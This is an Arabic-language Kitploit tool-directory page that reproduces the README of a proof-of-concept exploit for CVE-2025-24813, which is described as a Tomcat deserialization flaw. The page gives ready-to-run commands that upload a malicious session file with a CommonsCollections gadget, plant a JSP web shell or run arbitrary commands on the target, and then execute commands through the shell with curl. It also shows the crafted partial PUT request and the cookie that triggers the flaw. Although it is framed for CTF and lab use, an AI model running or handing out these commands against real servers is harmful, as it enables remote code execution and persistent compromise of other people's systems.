Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24813 — الحمولة الصحيحة لـ CVE في Java | Kitploit
أدوات/GitHubGitHub/loufa0/cve-2025-24813
ماسحات الثغرات الأمنيةالاستغلالأمن الويبCTFالتعلم والتعليممختبرات وتدريب عملي
GitHubloufa0/cve-2025-24813

CVE-2025-24813

الحمولة الصحيحة لـ CVE في Java

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24813 Tomcat PoC

PoC لبيئة CTF/مختبر مصرح بها. يستغل ثغرة CVE-2025-24813 عبر الكتابة الجزئية لملف جلسة Tomcat باستخدام PUT، ثم يطلق إلغاء التسلسل باستخدام JSESSIONID.

المتطلبات الأساسية

  • Python 3
  • وحدة Python requests
  • Java JDK (java و javac)
  • الملف المرفق commons-collections-3.2.1.jar الموضوع في هذا المجلد

ysoserial غير مطلوب.

الملفات

  • poc_cve_2025_24813.py: غلاف Python يؤتمت التوليد والرفع والإطلاق.
  • GenerateTomcatSessionPayload.java: يولّد جلسة Tomcat صالحة تحتوي على gadget CommonsCollections.
  • commons-collections-3.2.1.jar: تبعية الـ gadget.
  • sh.jsp: شيل JSP اختياري يُنشر بواسطة --drop-shell.

الاستخدام

ضع شيل JSP في جذر الويب الافتراضي /opt/tomcat/webapps/ROOT:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

تنفيذ أمر مباشر دون وضع شيل:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

إذا كان جذر الويب مختلفًا:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

إذا تم نقل ملف JAR، فحدد مساره:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

بعد الاستغلال

إذا نجح --drop-shell:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

الشروط على الجانب المستهدف

  • إصدار Tomcat معرّض للثغرة.
  • DefaultServlet قابل للكتابة، عادةً بإعداد readonly=false.
  • دعم PUT الجزئي.
  • جلسات مستمرة عبر PersistentManager و FileStore.
  • سلسلة gadget متاحة على الخادم، وهنا commons-collections.

السلوك المتوقع أثناء الرفع غالبًا ما يكون HTTP 409 Conflict على:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

ثم يتم إطلاق إلغاء التسلسل باستخدام:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
تنزيل الأداة